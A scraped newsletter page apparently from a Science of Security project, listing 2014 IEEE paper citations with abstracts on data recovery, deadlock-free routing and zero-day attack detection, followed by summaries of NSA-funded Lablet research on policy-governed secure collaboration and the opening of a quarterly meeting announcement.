  • Sun, J.; Liao, H.; Upadhyaya, B.R., "A Robust Functional-Data-Analysis Method for Data Recovery in Multichannel Sensor Systems," Cybernetics, IEEE Transactions on , vol.44, no.8, pp.1420,1431, Aug. 2014. Multichannel sensor systems are widely used in condition monitoring for effective failure prevention of critical equipment or processes. However, loss of sensor readings due to malfunctions of sensors and/or communication has long been a hurdle to reliable operations of such integrated systems. Moreover, asynchronous data sampling and/or limited data transmission are usually seen in multiple sensor channels. To reliably perform fault diagnosis and prognosis in such operating environments, a data recovery method based on functional principal component analysis (FPCA) can be utilized. However, traditional FPCA methods are not robust to outliers and their capabilities are limited in recovering signals with strongly skewed distributions (i.e., lack of symmetry). This paper provides a robust data-recovery method based on functional data analysis to enhance the reliability of multichannel sensor systems. The method not only considers the possibly skewed distribution of each channel of signal trajectories, but is also capable of recovering missing data for both individual and correlated sensor channels with asynchronous data that may be sparse as well. In particular, grand median functions, rather than classical grand mean functions, are utilized for robust smoothing of sensor signals. Furthermore, the relationship between the functional scores of two correlated signals is modeled using multivariate functional regression to enhance the overall data-recovery capability. An experimental flow-control loop that mimics the operation of coolant-flow loop in a multimodular integral pressurized water reactor is used to demonstrate the effectiveness and adaptability of the proposed data-recovery method. The computational results illustrate that the proposed method is robust to outliers and more capable than the existing FPCA-based method in terms of the accuracy in recovering strongly skewed signals. In addition, turbofan engine data are also analyzed to verify the capability of t- e proposed method in recovering non-skewed signals.
    Keywords: Bandwidth; Data models; Eigenvalues and eigenfunctions; Predictive models; Robustness; Sensor systems; Sun; Asynchronous data; condition monitoring; data recovery; robust functional principal component analysis (ID#:14-2245)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6670785&isnumber=6856256
  • Nower, N.; Yasuo Tan; Lim, AO., "Efficient Temporal and Spatial Data Recovery Scheme for Stochastic and Incomplete Feedback Data of Cyber-physical Systems," Service Oriented System Engineering (SOSE), 2014 IEEE 8th International Symposium on , vol., no., pp.192,197, 7-11 April 2014. Feedback loss can severely degrade the overall system performance, in addition, it can affect the control and computation of the Cyber-physical Systems (CPS). CPS hold enormous potential for a wide range of emerging applications including stochastic and time-critical traffic patterns. Stochastic data has a randomness in its nature which make a great challenge to maintain the real-time control whenever the data is lost. In this paper, we propose a data recovery scheme, called the Efficient Temporal and Spatial Data Recovery (ETSDR) scheme for stochastic incomplete feedback of CPS. In this scheme, we identify the temporal model based on the traffic patterns and consider the spatial effect of the nearest neighbor. Numerical results reveal that the proposed ETSDR outperforms both the weighted prediction (WP) and the exponentially weighted moving average (EWMA) algorithm regardless of the increment percentage of missing data in terms of the root mean square error, the mean absolute error, and the integral of absolute error.
    Keywords: data handling; mean square error methods; stochastic processes; CPS; ETSDR scheme; cyber-physical systems; efficient temporal and spatial data recovery; feedback loss; incomplete feedback data; integral of absolute error; mean absolute error; nearest neighbor; real-time control; root mean square error; spatial data recovery scheme; stochastic feedback data; stochastic incomplete feedback; stochastic traffic patterns; system performance; temporal data recovery scheme ;temporal model identification; time-critical traffic patterns; Computational modeling; Correlation; Data models; Mathematical model; Measurement uncertainty; Spatial databases; Stochastic processes; auto regressive integrated moving average; cyber-physical system; data recovery scheme; spatial correlation; stochastic data; temporal correlation (ID#:14-2246)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6830905&isnumber=6825948
  • Kyoungwoo Heo, "An Accumulated Loss Recovery Algorithm on Overlay Multicast System Using Fountain Codes," Information Science and Applications (ICISA), 2014 International Conference on , vol., no., pp.1,3, 6-9 May 2014. In this paper, we propose an accumulated loss recovery algorithm on overlay multicast system using Fountain codes. Fountain code successfully decodes the packet loss, but it is weak in accumulated losses on multicast tree. The proposed algorithm overcomes an accumulated loss and significantly reduces delay on overlay multicast tree.
    Keywords: error correction codes; multicast communication; overlay networks; packet radio networks; trees (mathematics);Fountain codes; accumulate loss recovery algorithm; delay reduction; overlay multicast system; overlay multicast tree; packet loss decoding; Decoding; Delays; Encoding; Overlay networks; Packet loss; Simulation (ID#:14-2247)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6847353&isnumber=6847317
  • Beraud-Sudreau, Q.; Begueret, J.-B.; Mazouffre, O.; Pignol, M.; Baguena, L.; Neveu, C.; Deval, Y.; Taris, T., "SiGe Clock and Data Recovery System Based on Injection-Locked Oscillator for 100 Gbit/s Serial Data Link," Solid-State Circuits, IEEE Journal of, vol. PP, no.99, pp.1,10, 30 April 2014. Clock and data recovery (CDR) systems are the first logic blocks in serial data receivers and the latter's performance depends on the CDR. In this paper, a 100 Gbit/s CDR designed in 130 nm BiCMOS SiGe is presented. The CDR uses an injection locked oscillator (ILO) which delivers the 100 GHz clock. The inherent phase shift between the recovered clock and the incoming data is compensated by a feedback loop which performs phase and frequency tracking. Furthermore, a windowed phase comparator has been used, first to lower the classical number of gates, in order to prevent any delay skews between the different phase detector blocks, then to decrease the phase comparator operating frequency, and furthermore to extend the ability to track zero bit patterns The measurements results demonstrate a 100 GHz clock signal extracted from 50 Gb/s input data, with a phase noise as low as $-$98 dBc/Hz at 100 kHz offset from the carrier frequency. The rms jitter of the 25 GHz recovered data is only 1.2 ps. The power consumption is 1.4 W under 2.3 V power supply.
    Keywords: 100 Gb/s; BiCMOS SiGe ;clock and data recovery (CDR); injection-locked oscillator (ILO); millimeter-wave data communication; phase comparator; phase-locked loop (PLL) (ID#:14-2248)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6808420&isnumber=4359912
  • Xinhai Zhang; Persson, M.; Nyberg, M.; Mokhtari, B.; Einarson, A; Linder, H.; Westman, J.; DeJiu Chen; Torngren, M., "Experience on Applying Software Architecture Recovery To Automotive Embedded Systems," Software Maintenance, Reengineering and Reverse Engineering (CSMR-WCRE), 2014 Software Evolution Week - IEEE Conference on , vol., no., pp.379,382, 3-6 Feb. 2014. The importance and potential advantages with a comprehensive product architecture description are well described in the literature. However, developing such a description takes additional resources, and it is difficult to maintain consistency with evolving implementations. This paper presents an approach and industrial experience which is based on architecture recovery from source code at truck manufacturer Scania CV AB. The extracted representation of the architecture is presented in several views and verified on CAN signal level. Lessons learned are discussed.
    Keywords: automobile industry; embedded systems; software architecture; source code (software); CAN signal level; Scania CV AB; automotive embedded systems; comprehensive product architecture description; extracted representation ;software architecture recovery; source code; truck manufacturer; Automotive engineering; Browsers; Computer architecture; Databases; Embedded systems; Software architecture; architecture recovery; automotive industry; distributed embedded systems; software engineering (ID#:14-2249)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6747199&isnumber=6747152
  • Xiang Zhou, "Efficient Clock and Carrier Recovery Algorithms for Single-Carrier Coherent Optical Systems: A systematic review on challenges and recent progress," Signal Processing Magazine, IEEE , vol.31, no.2, pp.35,45, March 2014. This article presents a systematic review on the challenges and recent progress of timing and carrier synchronization techniques for high-speed optical transmission systems using single-carrier-based coherent optical modulation formats.
    Keywords: optical communication; optical modulation; synchronization; carrier recovery algorithm; carrier synchronization technique; clock recovery algorithm; high-speed optical transmission system; single-carrier-based coherent optical modulation format; timing synchronization technique; Clocks; Digital signal processing; High-speed optical techniques; Optical distortion; Optical receivers; Optical signal processing; Signal processing algorithms; Timing} (ID#:14-2250)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6739185&isnumber=6739177
  • Stephens, B.; Cox, AL.; Singla, A; Carter, J.; Dixon, C.; Felter, W., "Practical DCB For Improved Data Center Networks," INFOCOM, 2014 Proceedings IEEE, vol., no., pp.1824,1832, April 27 2014-May 2 2014. Storage area networking is driving commodity data center switches to support lossless Ethernet (DCB). Unfortunately, to enable DCB for all traffic on arbitrary network topologies, we must address several problems that can arise in lossless networks, e.g., large buffering delays, unfairness, head of line blocking, and deadlock. We propose TCP-Bolt, a TCP variant that not only addresses the first three problems but reduces flow completion times by as much as 70%. We also introduce a simple, practical deadlock-free routing scheme that eliminates deadlock while achieving aggregate network throughput within 15% of ECMP routing. This small compromise in potential routing capacity is well worth the gains in flow completion time. We note that our results on deadlock-free routing are also of independent interest to the storage area networking community. Further, as our hardware testbed illustrates, these gains are achievable today, without hardware changes to switches or NICs.
    Keywords: computer centers; local area networks; routing protocols; switching networks; telecommunication network topology ;telecommunication traffic; transport protocols; DCB; ECMP routing; NIC; TCP-bolt; arbitrary network topology traffic; buffering delay; commodity data center switch; data center bridging; deadlock-free routing scheme ;improved data center network; line blocking head ;lossless Ethernet; storage area networking; Hardware; Ports (Computers); Routing; System recovery; Throughput; Topology; Vegetation (ID#:14-2251)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6848121&isnumber=6847911
  • Chieh-Hao Chang; Jung-Chun Kao; Fu-Wen Chen; Shih Hsun Cheng, "Many-to-All Priority-Based Network-Coding Broadcast In Wireless Multihop Networks," Wireless Telecommunications Symposium (WTS), 2014 , vol., no., pp.1,6, 9-11 April 2014. This paper addresses the minimum transmission broadcast (MTB) problem for the many-to-all scenario in wireless multihop networks and presents a network-coding broadcast protocol with priority-based deadlock prevention. Our main contributions are as follows: First, we relate the many-to-all-with-network-coding MTB problem to a maximum out-degree problem. The solution of the latter can serve as a lower bound for the number of transmissions. Second, we propose a distributed network-coding broadcast protocol, which constructs efficient broadcast trees and dictates nodes to transmit packets in a network coding manner. Besides, we present the priority-based deadlock prevention mechanism to avoid deadlocks. Simulation results confirm that compared with existing protocols in the literature and the performance bound we present, our proposed network-coding broadcast protocol performs very well in terms of the number of transmissions.
    Keywords: network coding; protocols; radio networks; telecommunication network topology ;trees (mathematics);broadcast trees; distributed many-to-all priority-based network-coding broadcast protocol; energy efficiency; many-to-all- with-network-coding MTB problem; maximum out-degree problem; minimum transmission broadcast problem; packet transmission; priority-based deadlock prevention; wireless multihop networks; Encoding; Network coding; Protocols; System recovery; Topology; Vectors; Wireless communication; broadcast; energy efficiency; network coding; wireless networks (ID#:14-2252)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6835020&isnumber=6834983
  • Verbeek, F.; Schmaltz, J., "A Decision Procedure for Deadlock-Free Routing in Wormhole Networks," Parallel and Distributed Systems, IEEE Transactions on , vol.25, no.8, pp.1935,1944, Aug. 2014. Deadlock freedom is a key challenge in the design of communication networks. Wormhole switching is a popular switching technique, which is also prone to deadlocks. Deadlock analysis of routing functions is a manual and complex task. We propose an algorithm that automatically proves routing functions deadlock-free or outputs a minimal counter-example explaining the source of the deadlock. Our algorithm is the first to automatically check a necessary and sufficient condition for deadlock-free routing. We illustrate its efficiency in a complex adaptive routing function for torus topologies. Results are encouraging. Deciding deadlock freedom is co-NP-Complete for wormhole networks. Nevertheless, our tool proves a 13 x 13 torus deadlock-free within seconds. Finding minimal deadlocks is more difficult. Our tool needs four minutes to find a minimal deadlock in a 11 x 11 torus while it needs nine hours for a 12 x 12 network.
    Keywords: computational complexity; computer networks; integer programming; linear programming; telecommunication network routing; telecommunication network topology; adaptive routing function; co-NP-complete problem; communication network design; deadlock freedom; deadlock-free routing; decision procedure; necessary condition; routing functions; sufficient condition; torus topologies; wormhole networks; wormhole switching technique; Design methodology; Grippers; Network topology; Routing; Switches; System recovery; Topology; Communication networks; automatic verification; deadlocks; formal methods; routing protocols (ID#:14-2253)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6564261&isnumber=6853425
  • Hardy, T.L., "Resilience: A holistic safety approach," Reliability and Maintainability Symposium (RAMS), 2014 Annual , vol., no., pp.1,6, 27-30 Jan. 2014. Decreasing the potential for catastrophic consequences poses a significant challenge for high-risk industries. Organizations are under many different pressures, and they are continuously trying to adapt to changing conditions and recover from disturbances and stresses that can arise from both normal operations and unexpected events. Reducing risks in complex systems therefore requires that organizations develop and enhance traits that increase resilience. Resilience provides a holistic approach to safety, emphasizing the creation of organizations and systems that are proactive, interactive, reactive, and adaptive. This approach relies on disciplines such as system safety and emergency management, but also requires that organizations develop indicators and ways of knowing when an emergency is imminent. A resilient organization must be adaptive, using hands-on activities and lessons learned efforts to better prepare it to respond to future disruptions. It is evident from the discussions of each of the traits of resilience, including their limitations, that there are no easy answers to reducing safety risks in complex systems. However, efforts to strengthen resilience may help organizations better address the challenges associated with the ever-increasing complexities of their systems.
    Keywords: emergency management; large-scale systems; reliability; risk management; safety; system recovery ;complex systems; emergency management; high-risk industries; holistic safety approach; resilience; system recovery; system risk reduction; system safety; Accidents; Hazards; Organizations; Personnel; Resilience; Systematics; emergency management; resilience; system safety (ID#:14-2254)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6798494&isnumber=6798433

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Zero Day Attacks

Zero Day Attacks



Attacks Zero day attacks exploit previously unknown vulnerabilities in software that programmers have not yet patched or fixed. Detection, protection, and correction are all necessary for reducing the consequences of such attacks. Research is finding methods for all three. Here, we cite works published in the first six months of 2014 addressing zero day attacks.

  • Holm, H., "Signature Based Intrusion Detection for Zero-Day Attacks: (Not) A Closed Chapter?," System Sciences (HICSS), 2014 47th Hawaii International Conference on , vol., no., pp.4895,4904, 6-9 Jan. 2014. A frequent claim that has not been validated is that signature based network intrusion detection systems (SNIDS) cannot detect zero-day attacks. This paper studies this property by testing 356 severe attacks on the SNIDS Snort, configured with an old official rule set. Of these attacks, 183 attacks are zero-days' to the rule set and 173 attacks are theoretically known to it. The results from the study show that Snort clearly is able to detect zero-days' (a mean of 17% detection). The detection rate is however on overall greater for theoretically known attacks (a mean of 54% detection). The paper then investigates how the zero-days' are detected, how prone the corresponding signatures are to false alarms, and how easily they can be evaded. Analyses of these aspects suggest that a conservative estimate on zero-day detection by Snort is 8.2%.
    Keywords: computer network security; digital signatures; SNIDS; false alarm; signature based network intrusion detection; zero day attacks; zero day detection; Computer architecture; Payloads; Ports (Computers); Reliability; Servers; Software; Testing; Computer security ;NIDS; code injection; exploits (ID#:14-2255)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6759203&isnumber=6758592
  • Pandey, Sudhir Kumar; Mehtre, B.M., "A Lifecycle Based Approach for Malware Analysis," Communication Systems and Network Technologies (CSNT), 2014 Fourth International Conference on , vol., no., pp.767,771, 7-9 April 2014. Most of the detection approaches like Signature based, Anomaly based and Specification based are not able to analyze and detect all types of malware. Signature-based approach for malware detection has one major drawback that it cannot detect zero-day attacks. The fundamental limitation of anomaly based approach is its high false alarm rate. And specification-based detection often has difficulty to specify completely and accurately the entire set of valid behaviors a malware should exhibit. Modern malware developers try to avoid detection by using several techniques such as polymorphic, metamorphic and also some of the hiding techniques. In order to overcome these issues, we propose a new approach for malware analysis and detection that consist of the following twelve stages Inbound Scan, Inbound Attack, Spontaneous Attack, Client-Side Exploit, Egg Download, Device Infection, Local Reconnaissance, Network Surveillance, & Communications, Peer Coordination, Attack Preparation, and Malicious Outbound Propagation. These all stages will integrate together as interrelated process in our proposed approach. This approach had solved the limitations of all the three approaches by monitoring the behavioral activity of malware at each any every stage of life cycle and then finally it will give a report of the maliciousness of the files or software's.
    Keywords: Computers; Educational institutions; Malware; Monitoring; Reconnaissance; Malware; Metamorphic; Polymorphic; Reconnaissance; Signature based; Zero day attack (ID#:14-2256)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6821503&isnumber=6821334
  • Kaur, R.; Singh, M., "A Survey on Zero-Day Polymorphic Worm Detection Techniques," Communications Surveys & Tutorials, IEEE, vol. PP, no.99, pp.1,30, March 2014. Zero-day polymorphic worms pose a serious threat to the Internet security. With their ability to rapidly propagate, these worms increasingly threaten the Internet hosts and services. Not only can they exploit unknown vulnerabilities but can also change their own representations on each new infection or can encrypt their payloads using a different key per infection. They have many variations in the signatures of the same worm thus, making their fingerprinting very difficult. Therefore, signature-based defenses and traditional security layers miss these stealthy and persistent threats. This paper provides a detailed survey to outline the research efforts in relation to detection of modern zero-day malware in form of zero-day polymorphic worms.
    Keywords: Grippers; Internet; Malware; Monitoring; Payloads; Vectors; Detection Systems; Polymorphic worms; Signature Generation; Zero-day attacks; Zero-day malware (ID#:14-2257)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6766917&isnumber=5451756
  • Lingyu Wang; Jajodia, S.; Singhal, A; Pengsu Cheng; Noel, S., "k-Zero Day Safety: A Network Security Metric for Measuring the Risk of Unknown Vulnerabilities," Dependable and Secure Computing, IEEE Transactions on , vol.11, no.1, pp.30,44, Jan.-Feb. 2014. By enabling a direct comparison of different security solutions with respect to their relative effectiveness, a network security metric may provide quantifiable evidences to assist security practitioners in securing computer networks. However, research on security metrics has been hindered by difficulties in handling zero-day attacks exploiting unknown vulnerabilities. In fact, the security risk of unknown vulnerabilities has been considered as something unmeasurable due to the less predictable nature of software flaws. This causes a major difficulty to security metrics, because a more secure configuration would be of little value if it were equally susceptible to zero-day attacks. In this paper, we propose a novel security metric, k-zero day safety, to address this issue. Instead of attempting to rank unknown vulnerabilities, our metric counts how many such vulnerabilities would be required for compromising network assets; a larger count implies more security because the likelihood of having more unknown vulnerabilities available, applicable, and exploitable all at the same time will be significantly lower. We formally define the metric, analyze the complexity of computing the metric, devise heuristic algorithms for intractable cases, and finally demonstrate through case studies that applying the metric to existing network security practices may generate actionable knowledge.
    Keywords: computer network security; computational complexity; heuristic algorithms; k zero day safety; network security metric; software flaws; Security metrics; attack graph; network hardening; network security (ID#:14-2258)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6529081&isnumber=6732792

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Lablet Activities

Lablet Activities


This section contains information on recent Lablet activities.

(ID#:14-3361)


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Lablet Research on Policy-Governed Secure Collaboration

Policy-Governed Secure Collaboration


EXECUTIVE SUMMARY: Over the past year the, NSA Science of Security lablets engaged in 7 NSA-approved research projects addressing the hard problem of Policy-Governed Secure Collaboration. All of the work done against this hard problem addressed other hard problems as well. UIUC's research involved other universities including Illinois Institute of Technology, USC, UPenn, and Dartmouth. The projects are in various stages of maturity, and several have led to publications and/or conference presentations. Summaries of the projects, highlights and publications are presented below.

1. Geo-Temporal Characterization of Security Threats (CMU)

SUMMARY: Addresses the hard problems of Policy-Governed Secure Collaboration and Resilient Architectures; provides an empirical basis for assessment and validation of security models; provides a global model of flow of threats and associated information.

HIGHLIGHTS AND PUBLICATIONS

  • Technical Report submitted
  • Identified central core network
  • Identified key actors attacking country of interest and being attacked by country of interest by type of attack
  • Technical Report: Ghita Mezzour, L. Richard Carley, Kathleen M. Carley, 2014, Global Mapping of Cyber Attacks, School of Computer Science, Institute for Software Research, Technical Report CMU-ISR-14-111

2. Scientific Understanding of Policy Complexity (NCSU)

SUMMARY: Addresses the hard problems of Policy-Governed Secure Collaboration and Human Behavior

  • Policy-Governed Secure Collaboration: Security policies can be very complex. The same policy can also be expressed in ways of different complexity. It is desirable to have a scientific understanding of measuring how complex a policy and a policy encoding is. Part of this work includes breaking down complex vulnerabilities into their constituent parts
  • Human Behavior: Our policy complexity is based on how easy for humans to understand and write policies. There is thus a human behavior aspect to it.

HIGHLIGHTS and PUBLICATIONS:

  • In an effort to break down complex policies, we have investigated ways to break down NIST's Common Weakness Enumeration (CWE), including experimenting with the Protege taxonomy tool (http://protege.stanford.edu/). It appears that the most fruitful route will be to take each vulnerability (there are about 1000), extract one or more code samples from it, then tag it using Protege. This will give an idea of what concepts are necessary to understand the vulnerability.

3. Formal Specification and Analysis of Security-Critical Norms and Policies (NCSU)

SUMMARY: Addresses the hard problems of Policy-Governed Secure Collaboration and Scalability and Composability

  • Policy-Governed Secure Collaboration: This project addresses how to specify and analyze norms (standards of correct collaborative behavior) and policies (ways of achieving different collaborative behaviors) to determine important properties, such as their mutual consistency.
  • Scalability and Composability: This project can facilitate the composition of new collaborative systems by combining sets of norms and policies, and verifying whether such combinations satisfy desired properties.

HIGHLIGHTS and PUBLICATIONS:

  • We are addressing our first research hypothesis, which is that norm and preference specification languages can be constructed that both adequately express typical collaboration scenarios as well as enable tractable checking of consistency, composability, and realizability via policies.
  • We have introduced a new notion of accountability that formulates accountability in normative terms, which will provide a connection between norms and policies and security properties, especially in the academic IT domain.
  • *We are formulating the problems of consistency and realizability in mathematical terms with a view toward producing criteria for designing algorithms for consistency and realizability of norms, policies, and preferences. To this end, we are investigating whether a set of norms is consistent and realizable through the policies and preferences of the collaborators and whether a set of norms achieves specified security properties with reference to the healthcare domain.
  • Amit K. Chopra and Munindar P. Singh, The Thing Itself Speaks: Accountability as a Foundation for Requirements in Sociotechnical Systems, Proceedings of the IEEE International Workshop on Requirements Engineering and Law (RELAW), Extended Abstract, Karlskrona, Sweden, IEEE Computer Society, 2014.

4. Understanding Effects of Norms and Policies on the Robustness, Liveness, and Resilience of Systems (NCSU)

SUMMARY: Addresses the hard problems of Policy-Governed Secure Collaboration and Resilient Architectures

  • Policy-Governed Secure Collaboration: Norms provide a standard of correctness for collaborative behavior, with respect to which policies of the participants can be evaluated individually or in groups.
  • Resilient Architectures: The study of robustness and resilience of systems modeled in terms of norms would provide a basis for understanding resilient social architectures.

HIGHLIGHTS and PUBLICATIONS:

  • We have developed prototype multiagent systems of simple structure on which to build more complex simulations of norms and policies on system properties.
  • We have developed a simplified model for an academic security setting that identifies the main stakeholders, norms that promote security, internal policies by which parties may autonomously decide to comply with (or not) different norms. We have realized this model in our multiagent simulation framework and are using the model not only to refine our understanding of the robustness, liveness, and resilience of norms as they pertain to security but also as a basis for understanding the requirements on a sufficiently expressive simulation framework.

5. A Hypothesis Testing Framework for Network Security (UIUC and Illinois Institute of Technology)

SUMMARY: Addresses four hard problems:

  • Scalability and Composability
  • Policy-Governed Secure Collaboration
  • Predictive Security Metrics
  • Resilient Architectures

HIGHLIGHTS and PUBLICATIONS:

  • A key part of our strategy is to test hypotheses within a model of a live network. We continued our work on the foundational rigorous network model along three dimensions: 1) network behavior under timing uncertainty, 2) modeling virtualized networks and 3) database model of network behavior.
  • Our workshop paper on modeling virtualized networks received the best paper award at HotSDN 2014.
  • Soudeh Ghorbani and Brighten Godfrey, "Towards Correct Network Virtualization", ACM Workshop on Hot Topics in Software Defined Networks (HotSDN), August 2014.
  • Dong Jin and Yi Ning, "Securing Industrial Control Systems with a Simulation-based Verification System", 2014 ACM SIGSIM Conference on Principles of Advanced Discrete Simulation, Denver, CO, May 2014 (Work-in-Progress Paper)

6. Science of Human Circumvention of Security (UIUC, USC, UPenn, Dartmouth)

SUMMARY: Our project most closely aligns with problem 5 (Understanding and Accounting for Human Behavior). However, it also pertains to problems 1 (Scalability and Composability), 2 Policy-Governed Secure Collaboration), and 3 (Predictive Security Metrics).

  • Scalability and Composability: We want to understand not just the drivers of individual incidents of human circumvention, but also the net effect of these incidents. Included here are measures of the environment (physical, organizational, hierarchical, embeddedness within larger systems.)
  • Policy-Governed Secure Collaboration: In order to create policies that in reality actually enable secure collaboration among users in varying domains, we need to understand and predict the de facto consequences of policies, not just the de juro ones.
  • Security-Metrics-Driven Evaluation, Design, Development, and Deployment: Making sane decisions about what security controls to deploy requires understanding the de facto consequences of these deployments---instead of just pretending that circumvention by honest users never happens.

HIGHLIGHTS and PUBLICATIONS:

  • Via fieldwork in real-world enterprises, we have been identifying and cataloging types and causes of circumvention by well-intentioned users. We are using help desk logs, records of security-related computer changes, analysis of user behavior in situ, and surveys---in addition to interviews and observations. We then began to build and validate models of usage and circumvention behavior, for individuals and then for populations within an enterprise.
  • The JAMIA paper by Smith and Koppel on usability problems with health IT (pre-SHUCS, but related) received another accolade, this time from the International Medical Informatics Association, which also named it one of best papers of 2014. We are updating that paper to include discoveries from our analysis of the workaround corpora above.
  • J. Blythe, R. Koppel, V. Kothari, and S. Smith. "Ethnography of Computer Security Evasions in Healthcare Settings: Circumvention as the Norm". HealthTech' 14: Proceedings of the 2014 USENIX Summit on Health Information Technologies, August 2014. Abstract: Healthcare professionals have unique motivations, goals, perceptions, training, tensions, and behaviors, which guide workflow and often lead to unprecedented workarounds that weaken the efficacy of security policies and mechanisms. Identifying and understanding these factors that contribute to circumvention, as well as the acts of circumvention themselves, is key to designing, implementing, and maintaining security subsystems that achieve security goals in healthcare settings. To this end, we present our research on workarounds to computer security in healthcare settings without compromising the fundamental health goals. We argue and demonstrate that understanding workarounds to computer security, especially in medical settings, requires not only analyses of computer rules and processes, but also interviews and observations with users and security personnel. In addition, we discuss the value of shadowing clinicians and conducting focus groups with them to understand their motivations and tradeoffs for circumvention. Ethnographic investigation of workflow is paramount to achieving security objectives. (This publication addresses Problems 5,1,2, and 3.)
  • R. Koppel. "Software Loved by its Vendors and Disliked by 70% of its Users: Two Trillion Dollars of Healthcare Information Technology's Promises and Disappointments". HealthTech'14: Keynote talk at the 2014 USENIX Summit on Health Information Technologies, August 2014. (This keynote talk addresses Problem 5.)
  • R. Koppel, J. Blythe, and S. Smith. "Ethnography of Computer Security Evasions in Healthcare Organizations: Circumvention of Cyber Controls". Talk at the European Sociological Association Midterm Conference, August 2014. (This talk addresses Problems 5 and 3.)

7. Trust, Recommendation Systems and Collaboration (UMD)

SUMMARY: Addresses Policy-Governed Secure Collaboration; Scalability and Composability, and Understanding and Accounting for Human Behavior

HIGHLIGHTS and PUBLICATIONS:

  • Our goal is to develop a transformational framework for a science of trust, and its impact on local policies for collaboration, in networked multi-agent systems. The framework will take human behavior into account from the start by treating humans as integrated components of these networks, interacting dynamically with other elements. The new analytical framework will be integrated, and validated, with empirical methods of analyzing experimental data on trust, recommendation, and reputation, from several datasets available to us, in order to capture fundamental trends and patterns of human behavior, including trust and mistrust propagation, confidence in trust, phase transitions in the dynamic graph models involved in the new framework, stability or instability of collaborations.
  • We developed new algorithms that effectively and provably use trust in distributed consensus problems in the presence of adversaries. Such problems are of interest in distributed fusion in sensor networks. We showed that a trust mechanism allows correct consensus to occur whereby without the trust mechanism this would not be possible.
  • We developed new mathematical models for networks that carry opinions (beliefs) in their nodes, while the interaction between the nodes (agents) can be positive (friends) or negative (enemies). We analyzed the dynamics of belief evolution and emergence in such signed networks and discovered new laws governing these dynamics.
  • We developed a novel model and an efficient solution algorithm to the so called "Advertisement Allocation Problem" in large social networks, using a new and innovative embedding of the graph in hyperbolic space. The new algorithm obtains the same results as other algorithms albeit with complexity lower by two orders of magnitude.
  • We demonstrated how physical layer security schemes can be successfully employed to create a trusted core and provide privacy protection in distributed control and inference schemes.
  • We investigated several problems in crowdsourcing, by developing novel methods and algorithms that can handle multiple domains of knowledge, multi-dimensional trust in the knowledge of people or experts, and budget constraints. We investigated analytically these problems and obtained new algorithms and results on their performance.
  • X. Liu and J.S. Baras, "Using Trust in Distributed Consensus With Adversaries in Sensor and Other Networks," invited paper, Proceedings of 17th International Conference on Information Fusion (FUSION 2014), Salamanca, Spain, July 7-10, 2014. Abstract: Extensive research efforts have been devoted to distributed consensus with adversaries. Many diverse applications drive this increased interest in this area including distributed collaborative sensor networks, sensor fusion and distributed collaborative control. We consider the problem of detecting Byzantine adversaries in a network of agents with the goal of reaching consensus. We propose a novel trust model that establishes both local trust based on local evidences and global trust based on local exchange of local trust values. We describe a trust-aware consensus algorithm that integrates the trust evaluation mechanism into the traditional consensus algorithm and propose various local decision rules based on local evidence. To further enhance the robustness of trust evaluation itself, we also provide a trust propagation scheme in order to take into account evidences of other nodes in the network. The algorithm is flexible and extensible to incorporate more complicated designs of decision rules and trust models. Then we show by simulation that the trust-aware consensus algorithm can effectively detect Byzantine adversaries and exclude them from consensus iterations even in sparse networks. These results can be applied for fusion of trust evidences as well as for sensor fusion when malicious sensors are present like for example in power grid sensing and monitoring.
  • J.S. Baras gave the following invited, plenary and keynote lectures on the topics, approach and results in this Task: J.S. Baras, "Security and Trust in a Networked Immersed World: From Components to Systems and Beyond," invited keynote lecture, Workshop on Security and Safety: Issues, Concepts and Ideas , 2nd Hellenic Forum for Science, Innovation and Technology, Demokritos Research Center, Athens, Greece, June 30 - July 4, 2014.

(ID#: 14-3365)


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


SoS Lablet Quarterly Meeting - NCSU

SoS Lablet Quarterly Meeting - NCSU


Raleigh, NC -- January 29, 2015

Lablet Researchers meet at NC State to exchange and advance research and Ideas about Science of Security

The quarterly Science of Security Lablet meeting, sponsored by NSA, was hosted by the Lablet at the North Carolina State University on January 27 and 28, 2015. Quarterly meetings are held to share research, coordinate, present interim findings, and stimulate thought and discussion about the Science of Security. Laurie Williams, Principal Investigator at NC State, organized the series of talks and discussions about technical and behavioral aspects of cybersecurity.

Orv Stockland
